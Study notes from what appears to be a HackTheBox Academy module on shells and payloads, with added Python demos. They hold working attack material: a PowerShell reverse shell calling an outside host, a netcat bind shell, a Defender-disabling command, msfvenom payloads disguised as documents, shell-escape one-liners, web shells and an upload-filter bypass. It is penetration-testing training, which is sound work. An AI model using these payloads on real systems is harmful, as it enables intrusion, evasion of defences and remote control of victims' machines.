HackTheBox Academy - Shells & Payloads

Updated 29-03-2026

Bind Shells

  • With a bind shell, the target system starts a listener and waits for the attack system to connect to it. This only works if we can reach that port inbound, which host and network firewalls often prevent

  • We can use Netcat to establish a bind shell. The named pipe carries our input into the shell, and the shell's output (stdout and stderr, merged by 2>&1) goes back out over the socket
    # on target (the server side of the connection)
    # bind an interactive bash shell to the TCP session
    rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f
    # note: "nc -l <ip> <port>" is the OpenBSD netcat syntax; the traditional/GNU netcat wants "nc -l -p 7777"

    # connect to the target from the attack box
    nc -nv 10.129.41.200 7777

Reverse Shells

  • With a reverse shell, the attack box has a listener running and the target initiates the connection back to it. Outbound connections are far more likely to be allowed through a firewall than inbound ones, which is why this is the more common choice

  • Reverse Shell Cheat Sheet is one resource that contains a list of different commands, code, and automated reverse shell generators

    # on attack box
    # start listener (sudo because 443 is a privileged port; 443 is picked so the callback blends in with HTTPS egress)
    sudo nc -lvnp 443

    # on target (windows)
    # -nop: no profile, -c: run the command string; the loop reads a line from the socket, runs it with iex, and writes the output back with a fake "PS <path>> " prompt
    powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.16.60',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

    # disable Defender real-time monitoring (needs an elevated shell; this one-liner is commonly flagged by Defender, so it may be blocked before we get that far)
    Set-MpPreference -DisableRealtimeMonitoring $true
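
  • The two sections above differ only in who listens. The following is an added example, not code from the HTB page: a minimal bind shell and a minimal reverse shell written in Python, run end to end over loopback so the two directions can be compared side by side. The 127.0.0.1 address, the OS-assigned port and the one-command session are assumptions of this example; in both variants the "target" side runs the received line with /bin/sh and writes the output back, exactly what the netcat/mkfifo pipeline and the PowerShell loop above do

```python
"""Added example (not from the HTB page): a bind shell and a reverse shell in
Python, run over loopback. Only the connection direction differs; the target
side of both runs the received command with /bin/sh and returns the output.
Assumptions: 127.0.0.1, an OS-chosen port, one command per session."""
import socket
import subprocess
import threading


def serve_shell(conn: socket.socket) -> None:
    """Target side, shared by both variants: read one command line from the
    peer, run it via /bin/sh, send stdout+stderr back, then close."""
    with conn:
        line = conn.makefile("rb").readline().decode().strip()
        result = subprocess.run(["/bin/sh", "-c", line],
                                capture_output=True, timeout=10)
        conn.sendall(result.stdout + result.stderr)
        conn.shutdown(socket.SHUT_WR)


def run_command(sock: socket.socket, command: str) -> str:
    """Operator side, shared by both variants: send one command and collect
    everything the target writes back until it closes the connection."""
    with sock:
        sock.sendall(command.encode() + b"\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode()


def bind_shell_demo(command: str) -> str:
    """Bind shell: the TARGET listens, the operator connects in
    (the page's `nc -l <target-ip> 7777` + `nc -nv <target-ip> 7777`)."""
    target = socket.socket()
    target.bind(("127.0.0.1", 0))            # port 0: let the OS pick one
    target.listen(1)
    port = target.getsockname()[1]

    def target_side():
        conn, _ = target.accept()
        serve_shell(conn)
        target.close()

    t = threading.Thread(target=target_side)
    t.start()
    operator = socket.create_connection(("127.0.0.1", port))  # operator -> target
    out = run_command(operator, command)
    t.join()
    return out


def reverse_shell_demo(command: str) -> str:
    """Reverse shell: the OPERATOR listens, the target connects out
    (the page's `nc -lvnp 443` + the PowerShell TCPClient one-liner)."""
    operator = socket.socket()
    operator.bind(("127.0.0.1", 0))
    operator.listen(1)
    port = operator.getsockname()[1]

    def target_side():
        conn = socket.create_connection(("127.0.0.1", port))  # target -> operator
        serve_shell(conn)

    t = threading.Thread(target=target_side)
    t.start()
    conn, _ = operator.accept()
    operator.close()
    out = run_command(conn, command)
    t.join()
    return out


if __name__ == "__main__":
    print("bind   :", bind_shell_demo("id").strip())
    print("reverse:", reverse_shell_demo("echo reverse-ok").strip())
```

    Run it on a Linux box with /bin/sh; the bind variant is the one that would fail first in the field, because it needs an inbound connection to the target's port.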

Automating Payloads & Delivery with Metasploit

  • Metasploit is used to exploit vulnerabilities and deliver payloads to gain a shell on a vulnerable system
    sudo msfconsole

    # search modules associated with smb
    search smb

    # select a module by its index in the search results (indexes change between searches, so use the full module path when scripting)
    use 56

    # examine options
    options

    # set required options (RHOSTS = target; LHOST/LPORT as well if the payload is a reverse shell)
    set RHOSTS 10.129.180.71

    # run exploit
    exploit

    # drop from the meterpreter session into a native OS shell (cmd.exe/sh, with whatever privileges the exploit gave us)
    shell

Crafting Payloads with MSFvenom

  • Staged payloads
    • a staged payload splits the attack into pieces so that more components can be sent over after the initial foothold
    • a small first piece (the stager) is executed on the target; it calls back to the attack box and downloads the rest of the payload (the stage) over the network
    • the stager is small by design because it has to fit into whatever memory or buffer space the exploit gives us, which leaves little room for the payload itself
  • Stageless payloads
    • the whole payload is sent in its entirety across the network connection without a separate stage
    • can be beneficial in environments with poor or low-bandwidth connectivity, where a staged payload's download step could lead to unstable shell sessions
    • less traffic on the wire and no second-stage download to spot, which is better for evasion
  • A stageless payload has the shell code and the network communications in one piece; for example, /meterpreter_reverse_tcp
  • linux/x86/shell/reverse_tcp is a staged payload, and we can tell from the name: the leading components are platform and architecture (linux/x86), and after them the stage and the stager are written as separate path components, /shell/ and /reverse_tcp. A stageless payload joins the two with an underscore instead, as in linux/x64/shell_reverse_tcp
    # list payloads
    msfvenom -l payloads

    # create stageless payload for linux (catch it on 10.10.14.113:443 with nc -lvnp 443 or a multi/handler set to the same payload name)
    msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

    # create stageless payload for windows
    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe
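
  • The naming rule above is easy to get wrong, and a handler set to the wrong kind of payload will simply never get a session. The following is an added example, not code from the HTB page or from Metasploit: it classifies a payload name as staged or stageless from the naming convention and derives the msfvenom line and the multi/handler settings that match it. The STAGES set is an approximation of Metasploit's stage names (my assumption, not the full list), and the LHOST/LPORT/output values are placeholders

```python
"""Added example, not from the HTB page: read a Metasploit payload name to
tell a staged payload from a stageless one, then derive the msfvenom command
and the multi/handler settings that match it.
Assumptions: STAGES approximates Metasploit's stage names; LHOST/LPORT and
the output file name are placeholders."""
import re
from typing import Optional

# Stage names that appear as their own path component in staged payloads
# (assumption: a representative set, not Metasploit's complete list).
STAGES = {"shell", "meterpreter", "vncinject", "dllinject", "upexec",
          "peinject", "patchupmeterpreter", "patchupdllinject", "custom"}
# Stagers/transports start with the connection direction.
TRANSPORT_RE = re.compile(r"^(reverse|bind|find)_")


def is_staged(payload: str) -> bool:
    """Staged:    <platform>[/<arch>]/<stage>/<stager>  e.g. linux/x86/shell/reverse_tcp
    Stageless: stage and transport joined by '_'       e.g. linux/x64/shell_reverse_tcp
               or a 'single' with no stage at all     e.g. cmd/unix/reverse_bash"""
    parts = payload.split("/")
    return (len(parts) >= 3
            and parts[-2] in STAGES
            and TRANSPORT_RE.match(parts[-1]) is not None)


def describe(payload: str) -> dict:
    """Break the name into kind / stage / transport."""
    parts = payload.split("/")
    if is_staged(payload):
        return {"kind": "staged", "stage": parts[-2], "transport": parts[-1]}
    m = re.match(r"^([a-z]+)_((?:reverse|bind|find)_.+)$", parts[-1])
    stage: Optional[str] = m.group(1) if m else None
    transport = m.group(2) if m else parts[-1]
    return {"kind": "stageless", "stage": stage, "transport": transport}


def build_commands(payload: str, lhost: str, lport: int,
                   fmt: str, outfile: str) -> dict:
    """msfvenom line plus the multi/handler settings that will catch it. The
    handler's PAYLOAD must be the exact same name: a staged handler waits to
    push a stage that a stageless payload never asks for, and vice versa."""
    return {
        "kind": describe(payload)["kind"],
        "msfvenom": (f"msfvenom -p {payload} LHOST={lhost} LPORT={lport} "
                     f"-f {fmt} -o {outfile}"),
        "handler": [
            "use exploit/multi/handler",
            f"set PAYLOAD {payload}",
            f"set LHOST {lhost}",
            f"set LPORT {lport}",
            "run",
        ],
    }


if __name__ == "__main__":
    for name in ("linux/x86/shell/reverse_tcp", "linux/x64/shell_reverse_tcp",
                 "windows/x64/meterpreter_reverse_https", "cmd/unix/reverse_bash"):
        print(f"{name:40} {describe(name)}")
    print("\n".join(build_commands("linux/x64/shell_reverse_tcp", "10.10.14.113",
                                  443, "elf", "createbackup.elf")["handler"]))
```

    The handler block is the part people forget: the stageless ELF built on the page will only give a session to a plain nc listener or to a multi/handler whose PAYLOAD is linux/x64/shell_reverse_tcp, not linux/x64/shell/reverse_tcp.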

Windows & Linux Shells

  • Resources
    • MSF is an extremely versatile tool for any pentester’s toolkit. It serves as a way to enumerate hosts, generate payloads, utilize public and custom exploits, and perform post-exploitation actions once on the host. Think of it as a swiss-army knife.
    • Payloads All The Things: here you can find many different resources and cheat sheets for payload generation and general methodology.
    • Mythic C2 framework is an alternative option to Metasploit as a Command and Control Framework and toolbox for unique payload generation.
    • Nishang is a framework collection of Offensive PowerShell implants and scripts. It includes many utilities that can be useful to any pentester.
    • Darkarmour is a tool to generate and utilize obfuscated binaries for use against Windows hosts.
  • On Windows:
    • Use CMD when:
      • You are on an older host that may not include PowerShell.
      • When you only require simple interactions/access to the host.
      • When you plan to use simple batch files, net commands, or MS-DOS native tools.
      • When you believe that execution policies may affect your ability to run scripts or other actions on the host.
    • Use PowerShell when:
      • You are planning to utilize cmdlets or other custom-built scripts.
      • When you wish to interact with .NET objects instead of text output.
      • When being stealthy is of lesser concern.
      • If you are planning to interact with cloud-based services and hosts.
      • If your scripts set and use Aliases.

Spawning Interactive Shells

  • There may be times that we land on a system with a limited shell (sometimes referred to as a jail shell); we can use different methods to spawn an interactive shell. Most of them simply exec a new shell from an interpreter or tool that is still allowed to run

    /bin/sh -i

    # spawn bash behind a pseudo-terminal (gives a proper tty; the most common upgrade)
    python -c 'import pty;pty.spawn("/bin/bash")'

    perl -e 'exec "/bin/sh";'

    # run from a perl script
    perl: exec "/bin/sh";

    # run from a ruby script
    ruby: exec "/bin/sh"

    # run from a lua script
    lua: os.execute('/bin/sh')

    awk 'BEGIN {system("/bin/sh")}'

    # abuse find's -exec to run awk, which then spawns the shell
    find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

    # -quit stops find after the first match, so only one shell is spawned
    find . -exec /bin/sh \; -quit

    vim -c ':!/bin/sh'

    # vim escape from inside the editor
    vim
    :set shell=/bin/sh
    :shell
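
  • The python one-liner above is the one that changes the most, because it allocates a pseudo-terminal rather than just exec'ing another shell. The following is an added example, not code from the HTB page: it runs the same probe command once through plain pipes (the situation in a reverse shell) and once behind a pty, the way pty.spawn does it, so the difference a real tty makes is visible. It assumes /bin/sh is present and that the host allows allocating a pty through /dev/ptmx, which an ordinary Linux box does

```python
"""Added example, not from the HTB page: what the
python -c 'import pty;pty.spawn("/bin/bash")' upgrade actually changes.
Without a pty the shell's stdin/stdout are pipes or sockets, so `test -t 0`
is false and tools behave as if in a jail; behind a pty they see a real tty.
Assumptions: /bin/sh exists and the host can allocate a pty via /dev/ptmx."""
import os
import pty
import subprocess

PROBE = "test -t 0 && echo tty || echo no-tty"


def run_without_pty(command: str) -> str:
    """The reverse-shell situation: stdin and stdout are not a terminal."""
    return subprocess.run(["/bin/sh", "-c", command], capture_output=True,
                          text=True, stdin=subprocess.DEVNULL).stdout


def run_with_pty(command: str) -> str:
    """What pty.spawn does for the shell: fork the child behind a pseudo-
    terminal so its stdin/stdout/stderr are a real tty device."""
    pid, master_fd = pty.fork()
    if pid == 0:                                  # child: becomes the shell
        os.execvp("/bin/sh", ["/bin/sh", "-c", command])
        os._exit(127)                             # only reached if exec fails
    chunks = []
    while True:
        try:
            data = os.read(master_fd, 4096)
        except OSError:                           # EIO on Linux: slave closed
            break
        if not data:                              # EOF on other platforms
            break
        chunks.append(data)
    os.close(master_fd)
    os.waitpid(pid, 0)
    # the tty line discipline turns \n into \r\n on output; normalise it back
    return b"".join(chunks).decode(errors="replace").replace("\r\n", "\n")


if __name__ == "__main__":
    print("pipes :", run_without_pty(PROBE).strip())   # no-tty
    print("pty   :", run_with_pty(PROBE).strip())      # tty
    print("device:", run_with_pty("tty").strip())      # e.g. /dev/pts/3
```

    This is also why the usual follow-up steps (stty raw -echo on the attack box, export TERM) only make sense after the pty upgrade: until then there is no terminal for them to act on.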

Web Shells

  • Laudanum is a repository of ready-made web shell files (ASP, ASPX, PHP, JSP, CFM and others) that can be uploaded onto a target to get command execution and, from there, a reverse shell
  • For most of the files within Laudanum, you can copy them as-is
  • For specific files such as the shells, we must edit the file first to insert our attacking host IP (the shells restrict access to an allowed-IP list so that nobody else can use our shell)
    # copy the shell somewhere we can edit it
    cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx

    # then edit the file to add our entries like our ip, etc
    # then we can upload it through the vulnerable file upload

Antak Webshell

  • Active Server Page Extended (ASPX) is a file type/extension written for Microsoft's ASP.NET Framework
  • Antak is a web shell built in ASP.NET and included within the Nishang project; it gives a PowerShell-style console in the browser and is protected by a username and password set inside the file
  • Antak files can be found in /usr/share/nishang/Antak-WebShell on Kali and Parrot
    # copy the shell somewhere we can edit it
    cp /usr/share/nishang/Antak-WebShell/antak.aspx /home/administrator/Upload.aspx

    # vim/nano to modify the shell for use (at minimum change the username and password near the top of the file)
    # then upload

PHP Web Shells

  • PHP (Hypertext Preprocessor) is an open-source general-purpose scripting language typically used as part of a web stack that powers a website
  • WhiteWinterWolf's PHP Web Shell can be used
    # sometimes a file upload only allows certain file types (.png, .jpg, .gif, etc.)
    # if the server decides based on the Content-Type header, we can bypass this with Burp Suite by intercepting the upload request and editing the header; it is set by the client, so the server cannot trust it

    # when uploading php where only images are allowed, we can change the content type from this
    application/x-php
    # to this
    image/gif

    # the file must still keep its .php extension (or otherwise be handed to the PHP interpreter) for the web shell to execute once uploaded
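
  • The following is an added example, not code from the HTB page or from any real project: it shows the Content-Type edit described above as a function, a naive upload check that it defeats, and a hardened check that it does not. The multipart part, the shell body and both check functions are constructed for this example

```python
"""Added example, not from the HTB page: why swapping Content-Type in Burp gets
a PHP web shell past a naive upload filter, shown as the vulnerable check next
to a hardened one. The multipart part and the shell body are constructed for
this example; both check functions are illustrative, not a real project's code."""
import os
import re
import uuid
from typing import Optional, Tuple

PHP_SHELL = b"<?php system($_GET['cmd']); ?>"   # constructed web shell body
# constructed multipart/form-data part as the browser would send it
RAW_PART = (b'Content-Disposition: form-data; name="file"; filename="shell.php"\r\n'
            b"Content-Type: application/x-php\r\n\r\n" + PHP_SHELL)

ALLOWED_MIME = {"image/gif", "image/png", "image/jpeg"}
ALLOWED_EXT = {".gif", ".png", ".jpg"}
MAGIC = {b"GIF89a": ".gif", b"GIF87a": ".gif",
         b"\x89PNG\r\n\x1a\n": ".png", b"\xff\xd8\xff": ".jpg"}


def retype_part(raw_part: bytes, new_type: str) -> bytes:
    """What the Burp edit does: rewrite the part's Content-Type line."""
    return re.sub(rb"Content-Type: [^\r\n]*",
                  b"Content-Type: " + new_type.encode(), raw_part, count=1)


def parse_part(raw_part: bytes) -> Tuple[str, str, bytes]:
    """Server side: pull filename, declared type and body out of one part."""
    headers, body = raw_part.split(b"\r\n\r\n", 1)
    filename = re.search(rb'filename="([^"]*)"', headers).group(1).decode()
    ctype = re.search(rb"Content-Type: ([^\r\n]*)", headers).group(1).decode()
    return filename, ctype, body


def vulnerable_accepts(filename: str, content_type: str, body: bytes) -> bool:
    """Trusts the client-supplied Content-Type only. Nothing ties the header
    to the bytes, so 'image/gif' with a PHP body sails through."""
    return content_type in ALLOWED_MIME


def hardened_accepts(filename: str, content_type: str,
                     body: bytes) -> Tuple[bool, Optional[str]]:
    """Ignores what the client claims. Accept only if the extension is on the
    allowlist AND the magic bytes agree with it, then store under a random,
    server-chosen name so the original filename never reaches disk. The
    upload directory must also be one the web server never executes scripts
    from: a GIF89a+PHP polyglot still passes this check, it just cannot run."""
    ext = os.path.splitext(filename)[1].lower()
    ext = ".jpg" if ext == ".jpeg" else ext
    if ext not in ALLOWED_EXT:
        return False, None
    detected = next((e for magic, e in MAGIC.items() if body.startswith(magic)), None)
    if detected != ext:
        return False, None
    return True, uuid.uuid4().hex + ext


if __name__ == "__main__":
    edited = retype_part(RAW_PART, "image/gif")            # the Burp change
    fn, ct, body = parse_part(edited)
    print("vulnerable filter accepts shell.php sent as image/gif:",
          vulnerable_accepts(fn, ct, body))
    print("hardened filter accepts it:", hardened_accepts(fn, ct, body))
```

    The hardened version deliberately never looks at content_type at all; the header is useful for logging, not for a decision.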